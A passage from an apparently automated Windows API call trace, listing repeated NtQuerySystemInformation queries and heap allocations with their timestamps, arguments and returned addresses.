SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.063] GetProcessHeap () returned 0x2026c630000 [0206.063] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63ccb0 [0206.063] GetProcessHeap () returned 0x2026c630000 [0206.063] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d5a7c40 [0206.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.065] GetProcessHeap () returned 0x2026c630000 [0206.065] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d2ed8c0 [0206.065] GetProcessHeap () returned 0x2026c630000 [0206.065] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d3995c0 [0206.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.065] GetProcessHeap () returned 0x2026c630000 [0206.065] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d340 [0206.065] GetProcessHeap () returned 0x2026c630000 [0206.066] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d5a81c0 [0206.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.075] GetProcessHeap () returned 0x2026c630000 [0206.075] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63cad0 [0206.075] GetProcessHeap () returned 0x2026c630000 [0206.075] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d5a84c0 [0206.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.076] GetProcessHeap () returned 0x2026c630000 [0206.076] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d2ff6c0 [0206.076] GetProcessHeap () returned 0x2026c630000 [0206.076] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d5b3840 [0206.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.077] GetProcessHeap () returned 0x2026c630000 [0206.077] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0206.077] GetProcessHeap () returned 0x2026c630000 [0206.077] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d5a54e0 [0206.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.089] GetProcessHeap () returned 0x2026c630000 [0206.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63ce90 [0206.089] GetProcessHeap () returned 0x2026c630000 [0206.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d604650 [0206.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.090] GetProcessHeap () returned 0x2026c630000 [0206.090] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d55a690 [0206.090] GetProcessHeap () returned 0x2026c630000 [0206.090] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d5ae770 [0206.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.091] GetProcessHeap () returned 0x2026c630000 [0206.091] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0206.091] GetProcessHeap () returned 0x2026c630000 [0206.091] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d6061f0 [0206.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.103] GetProcessHeap () returned 0x2026c630000 [0206.103] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63cbc0 [0206.103] GetProcessHeap () returned 0x2026c630000 [0206.103] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d6061f0 [0206.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.104] GetProcessHeap () returned 0x2026c630000 [0206.104] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d55a690 [0206.104] GetProcessHeap () returned 0x2026c630000 [0206.104] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65f090 [0206.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.105] GetProcessHeap () returned 0x2026c630000 [0206.105] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c8f0 [0206.105] GetProcessHeap () returned 0x2026c630000 [0206.105] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d60b4d0 [0206.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.135] GetProcessHeap () returned 0x2026c630000 [0206.135] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c710 [0206.135] GetProcessHeap () returned 0x2026c630000 [0206.135] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71c400 [0206.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.138] GetProcessHeap () returned 0x2026c630000 [0206.138] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d55a690 [0206.138] GetProcessHeap () returned 0x2026c630000 [0206.138] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d660170 [0206.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.138] GetProcessHeap () returned 0x2026c630000 [0206.138] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0206.138] GetProcessHeap () returned 0x2026c630000 [0206.138] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71c4e0 [0206.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.142] GetProcessHeap () returned 0x2026c630000 [0206.142] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0206.142] GetProcessHeap () returned 0x2026c630000 [0206.142] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71c940 [0206.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.143] GetProcessHeap () returned 0x2026c630000 [0206.143] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6dc680 [0206.143] GetProcessHeap () returned 0x2026c630000 [0206.143] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65fc30 [0206.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.143] GetProcessHeap () returned 0x2026c630000 [0206.143] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c710 [0206.143] GetProcessHeap () returned 0x2026c630000 [0206.143] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71cd80 [0206.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.165] GetProcessHeap () returned 0x2026c630000 [0206.165] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63cad0 [0206.165] GetProcessHeap () returned 0x2026c630000 [0206.165] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71cba0 [0206.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.167] GetProcessHeap () returned 0x2026c630000 [0206.168] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6dc8c0 [0206.168] GetProcessHeap () returned 0x2026c630000 [0206.168] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d660ef0 [0206.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.168] GetProcessHeap () returned 0x2026c630000 [0206.168] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0206.168] GetProcessHeap () returned 0x2026c630000 [0206.168] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d716da0 [0206.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x50, ResultLength=0x0) [0206.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x50, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x50, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x50, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x50, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x50, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x50, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x38, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x28, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x38, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x28, ResultLength=0x0) [0206.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x28, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x38, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x38, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0206.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfb0, Length=0x20, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfb0, Length=0x20, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x50, ResultLength=0x0) [0206.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.183] NtQuerySystemInformation 